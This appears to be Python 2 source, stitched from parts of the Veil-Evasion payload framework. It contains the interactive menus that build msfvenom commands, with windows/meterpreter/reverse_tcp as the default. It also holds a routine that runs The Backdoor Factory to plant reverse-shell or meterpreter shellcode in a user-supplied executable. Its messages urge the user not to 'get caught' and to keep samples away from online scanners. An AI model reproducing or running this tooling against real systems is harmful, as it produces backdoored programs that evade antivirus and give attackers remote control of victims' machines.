"\n [!] Internal error #2. Unable to generate output. Please run %s manually\n"
% (os.path.abspath("./config/update.py")),
warning=True,
)
if interactive:
raw_input(" [>] Press any key to return to the main menu.")
print ""
self.MainMenu(showMessage=True)
return OutputFileName
def endmsg():
"""
Print the exit message.
"""
print " [*] Your payload files have been generated, don't get caught!"
print helpers.color(" [!] And don't submit samples to any online scanner! ;)\n", warning=True)
def menu(self):
"""
Main interactive menu for shellcode selection.
Utilizes Completer() to do tab completion on loaded metasploit payloads.
"""
payloadSelected = None
options = None
# if no generation method has been selected yet
if self.msfvenomCommand == "" and self.customshellcode == "":
# prompt for custom shellcode
customShellcode = self.custShellcodeMenu()
# if custom shellcode is specified, set it
if customShellcode:
self.customshellcode = customShellcode
# else, if no custom shellcode is specified, prompt for metasploit
else:
# instantiate our completer object for tab completion of available payloads
comp = completers.MSFCompleter(self.payloadTree)
# we want to treat '/' as part of a word, so override the delimiters
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
# have the user select the payload
while payloadSelected == None:
print '\n [*] Press [enter] for windows/meterpreter/reverse_tcp'
print ' [*] Press [tab] to list available payloads'
payloadSelected = raw_input(' [>] Please enter metasploit payload: ').strip()
if payloadSelected == "":
# default to reverse_tcp for the payload
payloadSelected = "windows/meterpreter/reverse_tcp"
try:
parts = payloadSelected.split("/")
# walk down the selected parts of the payload tree to get to the options at the bottom
options = self.payloadTree
for part in parts:
options = options[part]
except KeyError:
# make sure user entered a valid payload
print helpers.color(" [!] ERROR: Invalid payload specified!\n", warning=True)
payloadSelected = None
# remove the tab completer
readline.set_completer(None)
# set the internal payload to the one selected
self.msfvenompayload = payloadSelected
# request a value for each required option
for option in options:
value = ""
while value == "":
### VALIDATION ###
# LHOST is a special case, so we can tab complete the local IP
if option == "LHOST":
# set the completer to fill in the local IP
readline.set_completer(completers.IPCompleter().complete)
value = raw_input(' [>] Enter value for \'LHOST\', [tab] for local IP: ')
if '.' in value:
hostParts = value.split(".")
if len(hostParts) > 1:
# if the last chunk is a number, assume it's an IP address
if hostParts[-1].isdigit():
# do a regex IP validation
if not re.match(r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$",value):
print helpers.color("\n [!] ERROR: Bad IP address specified.\n", warning=True)
value = ""
# otherwise assume we've been passed a domain name
else:
if not helpers.isValidHostname(value):
print helpers.color("\n [!] ERROR: Bad hostname specified.\n", warning=True)
value = ""
# if we don't have at least one period in the hostname/IP
else:
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
elif ':' in value:
try:
socket.inet_pton(socket.AF_INET6, value)
except socket.error:
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
else:
print helpers.color("\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True)
value = ""
# LPORT validation
else:
# set the completer to fill in the default MSF port (4444)
readline.set_completer(completers.MSFPortCompleter().complete)
value = raw_input(' [>] Enter value for \'' + option + '\': ')
if option == "LPORT":
try:
if int(value) <= 0 or int(value) >= 65535:
print helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True)
value = ""
except ValueError:
print helpers.color(" [!] ERROR: Bad port number specified.\n", warning=True)
value = ""
# append all the msfvenom options
self.msfvenomOptions.append(option + "=" + value)
# allow the user to input any extra OPTION=value pairs
extraValues = list()
while True:
# clear out the tab completion
readline.set_completer(completers.none().complete)
selection = raw_input(' [>] Enter extra msfvenom options in -OPTION=value or syntax: ')
if selection != "":
num_extra_options = selection.split(' ')
for xtra_opt in num_extra_options:
if xtra_opt is not '':
final_opt = xtra_opt.split('=')[0] + " " + xtra_opt.split('=')[1]
extraValues.append(final_opt)
else: break
# grab any specified msfvenom options in the /etc/veil/settings.py file
msfvenomOptions = ""
if hasattr(settings, "MSFVENOM_OPTIONS"):
msfvenomOptions = settings.MSFVENOM_OPTIONS
# build out the msfvenom command
# TODO: detect Windows and modify the paths appropriately
self.msfvenomCommand = "msfvenom " + msfvenomOptions + " -p " + payloadSelected
for option in self.msfvenomOptions:
self.msfvenomCommand += " " + option
self.options.append(option)
if len(extraValues) != 0 :
self.msfvenomCommand += " " + " ".join(extraValues)
self.msfvenomCommand += " -b \'\\x00\\x0a\\xff\' -f c | tr -d \'\"\' | tr -d \'\n\'"
def PayloadMenu(self, payload, showTitle=True, args=None):
"""
Main menu for interacting with a specific payload.
payload = the payload object we're interacting with
showTitle = whether to show the main Veil title menu
Returns the output of OutputMenu() (the full path of the source file or compiled .exe)
"""
comp = completers.PayloadCompleter(self.payloadCommands, self.payload)
readline.set_completer_delims(" \t\n;")
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
# show the title if specified
if showTitle:
if settings.TERMINAL_CLEAR != "false":
messages.title()
# extract the payload class name from the instantiated object
# YES, I know this is a giant hack :(
# basically need to find "payloads" in the path name, then build
# everything as appropriate
payloadname = "/".join(
str(str(payload.__class__)[str(payload.__class__).find("payloads") :]).split(".")[0].split("/")[1:]
)
print "\n Payload: " + helpers.color(payloadname) + " loaded\n"
self.PayloadInfo(payload, showTitle=False, showInfo=False)
messages.helpmsg(self.payloadCommands, showTitle=False)
choice = ""
while choice == "":
while True:
choice = raw_input(" [%s>>]: " % payloadname).strip()
if choice != "":
parts = choice.strip().split()
cmd = parts[0].lower()
# display help menu for the payload
if cmd == "info":
self.PayloadInfo(payload)
choice = ""
if cmd == "help":
messages.helpmsg(self.payloadCommands)
choice = ""
# head back to the main menu
if cmd == "main" or cmd == "back" or cmd == "home":
# finished = True
return ""
# self.MainMenu()
if cmd == "exit" or cmd == "end" or cmd == "quit":
raise KeyboardInterrupt
# Update Veil via git
if cmd == "update":
self.UpdateVeil()
# set specific options
if cmd == "set":
# catch the case of no value being supplied
if len(parts) == 1:
print helpers.color(" [!] ERROR: no value supplied\n", warning=True)
else:
option = parts[1].upper()
value = "".join(parts[2:])
#### VALIDATION ####
# validate LHOST
if option == "LHOST":
if "." in value:
hostParts = value.split(".")
if len(hostParts) > 1:
# if the last chunk is a number, assume it's an IP address
if hostParts[-1].isdigit():
# do a regex IP validation
if not re.match(
r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$",
value,
):
print helpers.color(
"\n [!] ERROR: Bad IP address specified.\n", warning=True
)
else:
try:
payload.required_options[option][0] = value
print " [i] %s => %s" % (option, value)
except KeyError:
print helpers.color(
"\n [!] ERROR #1: Specify LHOST value in the following screen.\n",
warning=True,
)
except AttributeError:
print helpers.color(
"\n [!] ERROR #2: Specify LHOST value in the following screen.\n",
warning=True,
)
# assume we've been passed a domain name
else:
if helpers.isValidHostname(value):
payload.required_options[option][0] = value
print " [i] %s => %s" % (option, value)
else:
print helpers.color(
"\n [!] ERROR: Bad hostname specified.\n", warning=True
)
else:
print helpers.color(
"\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True
)
elif ":" in value:
try:
socket.inet_pton(socket.AF_INET6, value)
payload.required_options[option][0] = value
print " [i] %s => %s" % (option, value)
except socket.error:
print helpers.color(
"\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True
)
value = ""
else:
print helpers.color(
"\n [!] ERROR: Bad IP address or hostname specified.\n", warning=True
)
value = ""
# validate LPORT
elif option == "LPORT":
try:
if int(value) <= 0 or int(value) >= 65535:
print helpers.color("\n [!] ERROR: Bad port number specified.\n", warning=True)
else:
try:
payload.required_options[option][0] = value
print " [i] %s => %s" % (option, value)
except KeyError:
print helpers.color(
"\n [!] ERROR: Specify LPORT value in the following screen.\n",
warning=True,
)
except AttributeError:
print helpers.color(
"\n [!] ERROR: Specify LPORT value in the following screen.\n",
warning=True,
)
except ValueError:
print helpers.color("\n [!] ERROR: Bad port number specified.\n", warning=True)
# set the specific option value if not validation done
else:
try:
payload.required_options[option][0] = value
print " [*] %s => %s" % (option, value)
except:
print helpers.color(" [!] ERROR: Invalid value specified.\n", warning=True)
cmd = ""
# generate the payload
if cmd == "generate" or cmd == "gen" or cmd == "run" or cmd == "go" or cmd == "do" or cmd == "make":
# make sure all required options are filled in first
if self.ValidatePayload(payload):
# finished = True
# actually generate the payload code
payloadCode = payload.generate()
# ensure we got some code back
if payloadCode != "":
# call the output menu
return self.OutputMenu(payload, payloadCode, args=args)
else:
print helpers.color("\n [!] WARNING: not all required options filled\n", warning=True)
if cmd == "options":
# if required options were specified, output them
if hasattr(self.payload, "required_options"):
self.PayloadOptions(self.payload)
def MainMenu(self, showMessage=True, args=None):
"""
Main interactive menu for payload generation.
showMessage = reset the screen and show the greeting message [default=True]
oneRun = only run generation once, returning the path to the compiled executable
used when invoking the framework from an external source
"""
self.outputFileName = ""
cmd = ""
try:
while cmd == "" and self.outputFileName == "":
# set out tab completion for the appropriate modules on each run
# as other modules sometimes reset this
comp = completers.MainMenuCompleter(self.commands, self.payloads)
readline.set_completer_delims(" \t\n;")
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
if showMessage:
# print the title, where we are, and number of payloads loaded
if settings.TERMINAL_CLEAR != "false":
messages.title()
print " Main Menu\n"
print "\t" + helpers.color(str(len(self.payloads))) + " payloads loaded\n"
messages.helpmsg(self.commands, showTitle=False)
showTitle = False
cmd = raw_input(" [menu>>]: ").strip()
# handle our tab completed commands
if cmd.startswith("help"):
if settings.TERMINAL_CLEAR != "false":
messages.title()
cmd = ""
showMessage = False
elif cmd.startswith("use"):
if len(cmd.split()) == 1:
if settings.TERMINAL_CLEAR != "false":
messages.title()
self.ListPayloads()
showMessage = False
cmd = ""
elif len(cmd.split()) == 2:
# pull out the payload/number to use
p = cmd.split()[1]
# if we're choosing the payload by numbers
if p.isdigit() and 0 < int(p) <= len(self.payloads):
x = 1
for (name, pay) in self.payloads:
# if the entered number matches the payload #, use that payload
if int(p) == x:
self.payload = pay
self.payloadname = name
self.outputFileName = self.PayloadMenu(self.payload, args=args)
x += 1
# else choosing the payload by name
else:
for (payloadName, pay) in self.payloads:
# if we find the payload specified, kick off the payload menu
if payloadName == p:
self.payload = pay
self.payloadname = payloadName
self.outputFileName = self.PayloadMenu(self.payload, args=args)
cmd = ""
if settings.TERMINAL_CLEAR != "false":
showMessage = True
# error catchings if not of form [use BLAH]
else:
cmd = ""
showMessage = False
elif cmd.startswith("update"):
self.UpdateVeil()
if settings.TERMINAL_CLEAR != "false":
showMessage = True
cmd = ""
elif cmd.startswith("checkvt"):
self.CheckVT()
if settings.TERMINAL_CLEAR != "false":
showMessage = True
cmd = ""
# clean payload folders
if cmd.startswith("clean"):
self.CleanPayloads()
if settings.TERMINAL_CLEAR != "false":
showMessage = True
cmd = ""
elif cmd.startswith("info"):
if len(cmd.split()) == 1:
if settings.TERMINAL_CLEAR != "false":
showMessage = True
cmd = ""
elif len(cmd.split()) == 2:
# pull out the payload/number to use
p = cmd.split()[1]
# if we're choosing the payload by numbers
if p.isdigit() and 0 < int(p) <= len(self.payloads):
x = 1
for (name, pay) in self.payloads:
# if the entered number matches the payload #, use that payload
if int(p) == x:
self.payload = pay
self.payloadname = name
self.PayloadInfo(self.payload)
x += 1
# else choosing the payload by name
else:
for (payloadName, pay) in self.payloads:
# if we find the payload specified, kick off the payload menu
if payloadName == p:
self.payload = pay
self.payloadname = payloadName
self.PayloadInfo(self.payload)
cmd = ""
showMessage = False
# error catchings if not of form [use BLAH]
else:
cmd = ""
showMessage = False
elif cmd.startswith("list") or cmd.startswith("ls"):
if len(cmd.split()) == 1:
if settings.TERMINAL_CLEAR != "false":
messages.title()
self.ListPayloads()
cmd = ""
showMessage = False
elif cmd.startswith("exit") or cmd.startswith("q"):
if self.oneRun:
# if we're being invoked from external code, just return
# an empty string on an exit/quit instead of killing everything
return ""
else:
print helpers.color("\n [!] Exiting...\n", warning=True)
sys.exit()
# select a payload by just the number
elif cmd.isdigit() and 0 < int(cmd) <= len(self.payloads):
x = 1
for (name, pay) in self.payloads:
# if the entered number matches the payload #, use that payload
if int(cmd) == x:
self.payload = pay
self.payloadname = name
self.outputFileName = self.PayloadMenu(self.payload, args=args)
x += 1
cmd = ""
if settings.TERMINAL_CLEAR != "false":
showMessage = True
# if nothing is entered
else:
cmd = ""
showMessage = False
# if we're looping forever on the main menu (Veil.py behavior)
# reset the output filname to nothing so we don't break the while
if not self.oneRun:
self.outputFileName = ""
return self.outputFileName
# catch any ctrl + c interrupts
except KeyboardInterrupt:
if self.oneRun:
# if we're being invoked from external code, just return
# an empty string on an exit/quit instead of killing everything
return ""
else:
print helpers.color("\n\n [!] Exiting...\n", warning=True)
sys.exit()
def generate(self):
if self.required_options["payload"][0] == "custom":
Shellcode = self.shellcode.generate()
raw = Shellcode.decode("string_escape")
f = open(settings.TEMP_DIR + "shellcode.raw", 'wb')
f.write(raw)
f.close()
backdoorCommand = "./backdoor.py -f " + self.required_options["orig_exe"][
0] + " -o payload.exe -s user_supplied_shellcode -U " + settings.TEMP_DIR + "shellcode.raw"
else:
shellcodeChoice = ""
if self.required_options["payload"][0] == "meter_tcp":
shellcodeChoice = "reverse_tcp_stager"
elif self.required_options["payload"][0] == "meter_https":
shellcodeChoice = "meterpreter_reverse_https"
elif self.required_options["payload"][0] == "rev_shell":
shellcodeChoice = "reverse_shell_tcp"
else:
print helpers.color(
"\n [!] Please enter a valid payload choice.",
warning=True)
raw_input("\n [>] Press any key to return to the main menu:")
return ""
# the command to invoke the backdoor factory
backdoorCommand = "./backdoor.py -f " + self.required_options[
"orig_exe"][
0] + " -o payload.exe -s " + shellcodeChoice + " -H " + self.required_options[
"LHOST"][0] + " -P " + self.required_options["LPORT"][0]
print helpers.color("\n [*] Running The Backdoor Factory...")
# be sure to set 'cwd' to the proper directory for hyperion so it properly runs
p = subprocess.Popen(backdoorCommand,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=settings.VEIL_EVASION_PATH +
"tools/backdoor/",
shell=True)
stdout, stderr = p.communicate()
try:
# read in the output .exe from /tmp/
f = open(
settings.VEIL_EVASION_PATH +
"tools/backdoor/backdoored/payload.exe", 'rb')
PayloadCode = f.read()
f.close()
except IOError:
print "\nError during The Backdoor Factory execution:\n" + helpers.color(
stdout, warning=True)
raw_input("\n[>] Press any key to return to the main menu:")
return ""
return PayloadCode
